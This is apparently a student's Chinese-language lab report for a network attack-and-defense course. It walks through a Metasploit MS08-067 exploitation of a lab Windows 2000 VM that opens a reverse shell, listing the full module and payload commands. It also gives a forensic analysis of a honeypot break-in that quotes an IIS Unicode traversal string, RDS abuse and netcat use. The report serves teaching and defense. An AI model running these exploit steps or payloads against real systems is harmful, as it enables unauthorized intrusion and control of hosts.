20212808 2021-2022-2 《网络攻防实践》实践六报告
20212808 2021-2022-2 《网络攻防实践》实践六报告
1.知识点梳理与总结
1.1 实验内容
一、动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
二、取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
1.2 实验原理:
1. Windows操作系统基本框架概述
Windows操作系统内核的基本模块
Windows执行体: 即Windows内核核心文件ntoskrnl.exe的上层接口, 包含基本的操作系统内核服务
Windows内核体: 即Windows内核核心文件moskrnl.exe中酌数实现与硬件体系结构支持代码,实现底层的操作系统功能
设备驱动程序: 包括将用户I/O操作映射为特定硬件设备I/O请求的硬件设备驱动程序, 以及文件系统与网络设备驱动程序
硬件抽象层: 即hal.dll文件, 是用于屏蔽Windows 内核与平台硬件差异性的底层代码。
Windows窗口与图形界面接口内核实现代码: 即win32k.sys文件
** Windows操作系统在用户态的代码模块则包括如下:**
系统支持进程:Windows开机自动启动的系统内建服务进程,如用于登录认证的logon进程
环境子系统服务进程:为运行环境提供支持的服务进程
服务进程:通过Windows的服务管理机制所启动的一系列系统及网络服务
用户应用软件:在用户态执行的各类用户应用软件
核心子系统DLL:很多dll动态连接库文件,作为用户态服务进程与应用软件和操作系统内核的交互接口
Windows操作系统内核中实现了如下的核心机制:
windows进程和线程管理机制:进程可以看作是可执行程序运行的容器,Windows线程作为指令执行的具体载体
Windows内存管理机制:Windows的虚拟内存空间分为系统核心内存区间与用户内存区间两部分
Windows文件管理机制:NTFS文件系统从ACL访问控制列表来保证文件资源读/写的安全性,较FAT更加安全,此外具有更高的性能、可靠性和磁盘利用效率。Windows上的可执行文件采用PE(Portable Executable)格式
Windows注册表管理机制:注册表被称为Windows操作系统的核心,Windows系统注册表存放了关于计算机硬件的配置信息、系统和应用软件的初始化信息、应用软件和文档文件的关联关系、硬件设备的说明以及各种状态信息和数据,包括Windows操作时不断引用的信息。在 Windows系统配置和控制方面承担着关键角色。
Windows的网络机制:1.各种网卡硬件的设备驱动程序,一般由第三方硬件厂商开发并提供,处于OSl参考模型的物理层。2.NDIS (Network Driver Interface Specification)库及miniport驱动程序,位千OSI链路层,为各种不同的网卡适配器驱动程序和TDI传输层之间构建了一个封装接口3.TDI,传输层,将网络请求格式化成IRP,以及申请网络地址和数据通信4.网络API DLL及TDI客户端,会话层和表示层,独立于具体协议提供网络交互和实现方式5.网络应用程序与服务进程,对应OSI应用层,通常使用各类网络API DLL来实现网络交互与通信功能。
2. Windows操作系统的安全体系结构与机制
windows安全体系结构:
windows的安全体系结构基于引用监控器这一经典的安全模型。
其最核心的是位于内核的SRM安全引用监视器,以及位于用户态的LSASS安全服务,并与winlogin、eventlog等相关服务一起实现身份认证机制
windows身份认证机制与授权、访问控制机制
windows下的身份通过一个唯一的SID安全符进行标识
windows为每个用户和计算机设置账户进行管理,并引入用户组来简化用户管理
windows的用户账户的口令通过加密处理之后被保存于SAM或者活动目录AD中。
winlogon、GINA、LSASS服务通过协作来完成本地身份认证的过程。
在程序进程控制块中包含一个安全访问令牌,继承了启动进程的账户的所有访问令牌。
windows下所有需要保护的内容都被抽象成对象,每个对象会关联一个SD安全描述符。
windows安全审计机制和其他安全机制
LSAS服务将保存审计策略,在对象安全描述符中的SACL列表中进行保存
再次之外,安全中心还具有防火墙、补丁自动更新、病毒防护机制。
安全中心之外还有,IPSec加密与验证机制、EFS加密文件系统、windows文件保护机制等。
3.Windows远程安全攻防技术
windows远程安全攻防的分类
远程口令猜测与破解攻击
攻击windows网络服务
攻击windows客户端及用户
Metasploit基础教程
1. Metasploit的相关模块、介绍
Exploits 漏洞模块,使用“有效载荷(payloads)”的模块
Payloads 有效载荷,由远程运行的代码组成
Encoders 编码器,确保“有效载荷”到达目的地
Nops 空指令模块,保持“有效载荷”大小一致
2. Metasploit常用命令介绍
show exploit 列出metasploit框架中的所有渗透攻击模块。
show payloads 列出metasploit框架中的所有攻击载荷。
show auxiliary 列出metasploit框架中的所有辅助攻击模块。
search name 查找metasploit框架中的所有渗透攻击和其他模块。
info 展示出制定渗透攻击或模块的相关信息。
use name 装载一个渗透攻击或者模块。
LHOST 目标主机链接的IP地址。
RHOST 远程主机或者目标主机。
set function 设置特定的配置参数。
run scriptname 运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。
use priv 加载特权提升扩展模块,来扩展meterpreter库。
use incognito 加载inconito功能(用来盗取目标主机的令牌或是假冒用户)
getsystem 通过各种攻击向量来提升到系统用户权限。
shell 以所有可用令牌来运行一个交互的shell。
3. windows远程攻击方法的防御措施
口令猜测和破解:关闭不需要的端口、配置主机防火墙来限制上述端口、利用网络防火墙来限制这些服务的访问和禁用存在缺陷的NTLM
远程渗透攻击防范措施:从软件设计上尽量减少渗透攻击、尽可能快的更新安全补丁、为零日漏洞配置缓解攻击配置、利用安全清单插件来固化网络、通过漏洞扫描软件来标识存在的漏洞。
4。Windows本地安全攻防技术
windows本地特权提升
本地提权的常见三种手段:溢出提权、windows错误系统配置、计划任务提权。
防范措施:及时打补丁、及时跟进厂家的安全警告
windows敏感信息窃取
包括windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等手段
防范措施:使用安全度高、能抵挡破解的口令
windows消灭踪迹
主要手段包括、关闭审计功能、清理事件日志。
防范措施:实现配置好系统审计和网络服务审计功能,并将日志传输到安全服务器中。
远程控制与后门
主要手段包括向受控主机中植入第三方的远程控制与后门程序,主要包含命令行远程控制程序和图形化远程控制程序。
防范措施:采用一些后门检测软件来尝试发现攻击者隐藏的后门程序。
2.实践过程
2.1 动手实践Metasploit windows attacker
- 任务:使用metasploit软件进行windows远程渗透统计实验
- 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
- 查看下IP地址
kali 192.168.200.2
windowsXP Attacker 192.168.200.3
SEEDUbuntu 192.168.200.4
win2k 192.168.200.10 - 打开kali的metasploit
- 搜索ms08_067漏洞search ms08_067,会显示出找到的渗透模块,这是针对这个漏洞的渗透攻击模块
- 使用命令use exploit/windows/smb/ms08_067_netapi使用该模块,
使用命令show options查看此漏洞需要的设置
使用命令show payloads查看此漏洞的载荷
选择第三个载荷进行攻击
- 通过命令set payload generic/shell_reverse_tcp设置攻击的载荷
通过命令set LHOST 192.168.200.2设置本机
通过命令set RHOST 192.168.200.10设置攻击目标
- 通过exploit发起攻击
回车可以进入受害靶机的shell输入命令行ipconfig查看靶机的IP攻击成功
2.2 取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
- 用本机的wireshark打开云班课老师上传的snort-0204@0117.log文件
编号为117的这一行/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
其中boot.ini是NT系统的启动文件,..%c0af..是"/"的Unicode编码。这是IIS存在的一个漏洞。说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况
再往下,可以看到攻击者试图向服务器获取一个msadcs.dll文件
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据ADM!ROX..以及那个mdb。我们可以通过谷歌查询到它是通过rain forest puppy编写的msadc(2).pl渗透攻击代码发起的。
然后攻击者就成功进入了系统。往下拉,可以看到到下图所示位置,发生了变化。攻击者建立了一个ftp连接。输入了用户名密码,下载了几个文件。
然后攻击者连接6969端口,获得了访问权限
从1361编号开始,攻击机发起了多次SQL注入攻击,通过修改用户名和口令的方式完成了利用FTP进行网络攻击工具软件nc.exe的注入操作。
然后在编号2339,右键追踪http流,我们可以看到,根据add,他应该是想提升权限
攻击者使用了什么破解工具进行攻击?
口令破解工具和nc.exe来实现对目标主机的攻击。Nc.exe:完成远程主机连接等工作。
攻击者如何使用这个破解工具进入并控制了系统?
Nc.exe:完成远程主机连接后,利用telnet操作实现对操作系统的控制。
当攻击者获得系统的访问权后做了什么?
对目标主机的文件系统进行了嗅探。
尝试在根目录下创建rdisk,但是没有成功。
并试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
还试图在其它端口(6969)上运行nc。
我们如何防止这样的攻击?
到微软官方网站下载针对上述漏洞的补丁
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
攻击者应该意识到了其攻击的是蜜罐主机
2.3 团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
- 以下都是重复的实践1的步骤,过程我就不再截图展示了,就直接显示执行的命令吧,如下:
(1)打开kali的metasploit
(2)search ms08_067,搜索ms08_067漏洞
(3)use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用
(4)show payloads,显示出有效的攻击载荷
(5)set PAYLOAD 3,设置攻击有效载荷
(6)show options,显示我们需要在攻击前需要设置的数据
(7)按照靶机RHOST,攻击机LHOST的原则配置IP
set RHOST 192.168.200.10
set LHOST 192.168.200.2
(8)show options,再次查看payload状态
(9)使用攻击命令exploit - 打开wireshark进行监听,可以看出攻击者ip地址192.168.200.2,端口1044,靶机ip地址192.168.200.10,端口4444等信息
攻击的发起时间。是从第一个ARP请求开始,即图中的序号17
27/30/34三个数据包是tcp三次握手包,建立连接后,从下图中我们发现攻击机向靶机发了许多SMB协议包
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。所以据此可以推断出,是利用这个漏洞攻击的
3.学习中遇到的问题及解决
分析过程较难,多百度
4.实践总结
整体不难,分析内容较难,不够清晰,还是多学习多实践。
